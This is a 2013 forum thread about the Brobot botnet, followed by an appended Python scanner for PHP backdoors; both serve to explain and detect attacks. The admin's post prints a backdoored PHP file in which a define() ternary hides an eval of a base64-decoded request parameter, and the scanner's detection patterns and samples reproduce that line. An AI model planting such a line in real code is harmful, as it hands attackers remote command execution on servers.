 PostPosted: Thu May 02, 2013 5:58 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022

Has anybody here heard about this?

Anybody interested in what it does? :) I had a really interesting few weeks investigating a client's hijacked server. Nobody's written anything detailed publicly about this exploit and it's been interesting discovering how it all works.

Will post more hopefully very soon but wondered if anyone has already heard of this.


 PostPosted: Fri May 03, 2013 3:59 am   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
According to an FBI report it is "the botnet used by the hacktivist group Izz ad-Din al-Qassam Cyber Fighters"

An update (April 2013) from the FBI noted some additional scripts in Brobot

More background on the bank attacks at this blog ... resilience

 PostPosted: Fri May 03, 2013 12:52 pm   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
relation to OpUSA or 07-May-2013 ... 0008.shtml ... than-bite/

 PostPosted: Sun May 05, 2013 10:35 am   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Hello at last.

I have a week off - staycation - during which I'm mostly just relaxing, organizing my apartment, doing social things, etc. So I'll be in and out.

Sadly: I left all my brobot research at work, so I will paraphrase my evidence.

The "brobot" botnet is really a collection of really stupidly configured websites operated by ISPs who do not put security in a very high priority.

The ISP who was hosting the compromised server I was asked to investigate wasn't performing any logging since that "ate up a lot of disk space" and they're running the "zeus" web server - not to be confused with the "zeus" malware.

Nutshell: Brobot consists of really non-secure web servers that allow a PHP script to execute pretty much ANY command a user wants it to execute.

Those commands include:

- Stop logging any errors.
- Allow my script to run indefinitely.
- Allow my script to attempt to upload or check the status of malicious files on several dozen external web servers that I believe are similarly insecure.

That's bad.

The example I found uses a fairly benign file that looks like it's just setting a bunch of global parameters and not much else. But tucked away inside that is a single line that executes an "eval" of a base-64 decoded parameter.

That parameter can contain any PHP command, and does indeed include the above two examples. It's an extremely dangerous file but it doesn't look like it is because it's filled with so much simple, routine functionality.

The bigger problem is: when I found this out, and when I was able to put in some extra logging to determine this, I contacted the 30 most commonly implemented external hosting companies. Most of them replied with "our server isn't infected. You don't know what you're talking about." They didn't even look into any of what I was telling them. They didn't disallow really majorly bad commands from continuing to be run on their servers, and in many cases they felt it was a burden to start logging anything.

The Brobot Botnet is not this "highly organized" criminal organization. Any one of you could choose a server and get it to do whatever you want. That doesn't mean you're now part of an organized criminal operation.

The media is doing a terrible job of reporting about this exploit, and worse than that: all security firms are only treating brobot as if it were a desktop infection, completely ignoring the fact that it can run on servers.

I'll post examples of what I found most likely next week. If I can find anything sooner I will post that too.



 PostPosted: Wed Jan 08, 2014 9:03 pm   
Getting started
User avatar

Joined: Wed Jul 25, 2012 7:29 pm
Posts: 21
Any chance you managed to get a copy of the files for this please?

 PostPosted: Mon Jan 13, 2014 6:28 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022

In a way, yes I did.

The files are not that obscure.

All that the hackers did was exploit obvious holes in PHP and Apache (very old versions) and were able to force a PHP file onto the server. It seems pretty innocuous on the surface. Can you guess which line is the real culprit for this "infection"?

define('SERVER_ROOT', '.');
define('SERVER_VERSION', '2.5');
define('BOOT_DIR', 'bootstrap');
define('SYSTEM_DIR', 'system');
define('SYSTEM_CONF_DIR', 'conf');
define('KERNEL_DIR', 'kernel');
define('SERVICES_DIR', 'services');
define('LIBRARIES_DIR', 'libs');
define('FRAMEWORKS_DIR', 'Frameworks');
define('IMPLEMENTATIONS_DIR', 'implementations');
define('EXTERN_DIR', 'extern');
define('APPS_DIR', 'apps');
define('USERS_DIR', 'users');
define('USERS_CONF_DIR', 'conf');
define('USERS_FILES_DIR', 'files');
define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['c_id'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
define('USERS_SHARE_DIR', 'share');
define('USERS_META_DIR', 'meta');
define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
define('WORKGROUPS_DIR', 'workgroups');
define('WORKGROUPS_CONF_DIR', 'conf');
define('WORKGROUPS_FILES_DIR', 'files');
define('WORKGROUPS_METAFILES_DIR', 'metafiles');
define('WORKGROUPS_META_DIR', 'meta');
define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
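An added example, not part of this thread and not the poster's files: a small Python scanner that flags the kind of line hidden in the file quoted above (an eval() of a base64-decoded request parameter, parked in the branch of a ternary so it sits mid-line among harmless defines), together with the "stop logging any errors" and "run indefinitely" behaviour described in the earlier post. SAMPLE_BACKDOOR is an abridged reproduction of the quoted file with a `<?php` opener prepended; the rule names, the decoder list and the specific PHP calls assumed for the logging/time-limit behaviour (error_reporting(0), set_time_limit(0), ini_set(...)) are my assumptions about how such lines typically look, not something the thread states.

```python
"""Flag the hidden eval() backdoor and the "helper" settings described in the thread.

Added example, not code from the forum posts. SAMPLE_BACKDOOR is an abridged
reproduction of the define() block quoted in the post; the rule names, decoder
list and the PHP calls assumed for "stop logging errors" / "run indefinitely"
are assumptions, not taken from the thread.
"""
import re
from dataclasses import dataclass
from typing import List

# Superglobals carrying attacker-controlled request input.
REQUEST_SOURCES = r"\$_(?:REQUEST|GET|POST|COOKIE)"
# Decoders commonly wrapped around an eval() payload (assumed list).
DECODERS = r"(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)"

RULES = [
    # The culprit line: eval() of a decoded request parameter.
    ("eval-of-decoded-request-input",
     rf"@?eval\s*\(\s*{DECODERS}\s*\(\s*{REQUEST_SOURCES}\s*\["),
    # Same thing without a decoding step.
    ("eval-of-request-input",
     rf"@?eval\s*\(\s*{REQUEST_SOURCES}\s*\["),
    # "Stop logging any errors" in its assumed typical form.
    ("error-logging-disabled",
     r"error_reporting\s*\(\s*0\s*\)"
     r"|ini_set\s*\(\s*['\"](?:display_errors|log_errors)['\"]\s*,\s*['\"]?(?:0|off|false)['\"]?\s*\)"),
    # "Allow my script to run indefinitely" in its assumed typical form.
    ("unlimited-execution-time",
     r"set_time_limit\s*\(\s*0\s*\)"
     r"|ini_set\s*\(\s*['\"]max_execution_time['\"]\s*,\s*['\"]?0['\"]?\s*\)"),
    # eval() parked in a ternary branch so it hides mid-line. define() returns
    # true on success, so `define(...) ? @eval(...) : ...` always takes the eval
    # branch, and the '@' silences any error the payload raises.
    ("eval-hidden-in-ternary", r"\?\s*@?eval\s*\("),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]


@dataclass(frozen=True)
class Finding:
    line: int      # 1-based line number in the scanned source
    rule: str      # which rule fired
    snippet: str   # the matched text, for the analyst's report


def scan_php(source: str) -> List[Finding]:
    """Return every rule hit in `source`, one Finding per (line, rule)."""
    findings: List[Finding] = []
    for lineno, text in enumerate(source.splitlines(), start=1):
        for name, regex in COMPILED:
            match = regex.search(text)
            if match:
                findings.append(Finding(lineno, name, match.group(0)))
    return findings


def scan_file(path: str) -> List[Finding]:
    """Convenience wrapper for scanning a PHP file on disk."""
    with open(path, "r", encoding="utf-8", errors="replace") as handle:
        return scan_php(handle.read())


# Abridged reproduction of the file quoted in the thread ('<?php' prepended).
SAMPLE_BACKDOOR = """<?php
define('SERVER_ROOT', '.');
define('SERVER_VERSION', '2.5');
define('BOOT_DIR', 'bootstrap');
define('SYSTEM_DIR', 'system');
define('SYSTEM_CONF_DIR', 'conf');
define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['c_id'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
define('USERS_SHARE_DIR', 'share');
define('USERS_META_DIR', 'meta');
"""

# Constructed sample of the assumed "stop logging" / "run forever" commands.
SAMPLE_HELPERS = """<?php
error_reporting(0);
set_time_limit(0);
ini_set('display_errors', 0);
echo 'ready';
"""

# Constructed clean file: the same style of defines with nothing hidden.
SAMPLE_CLEAN = """<?php
define('SERVER_ROOT', '.');
define('SYSTEM_SKEL_DIR', 'skel');
"""

if __name__ == "__main__":
    for label, sample in (("backdoor", SAMPLE_BACKDOOR),
                          ("helpers", SAMPLE_HELPERS),
                          ("clean", SAMPLE_CLEAN)):
        print(f"--- {label} ---")
        for hit in scan_php(sample):
            print(f"line {hit.line}: {hit.rule}: {hit.snippet}")
```

Run it as-is to see the report, or call scan_file() on a suspect document root. The rules are line-oriented regexes, which is exactly what catches a one-liner buried in a wall of defines, but they will not catch payloads assembled at runtime (concatenated function names, variable functions, includes from uploaded files); treat a hit as a reason to pull the file for review, and treat a clean scan as no more than that.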

